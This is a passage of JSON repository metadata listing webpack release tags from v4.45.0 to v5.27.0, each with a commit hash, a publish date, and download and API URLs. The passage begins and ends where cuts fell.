d":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repo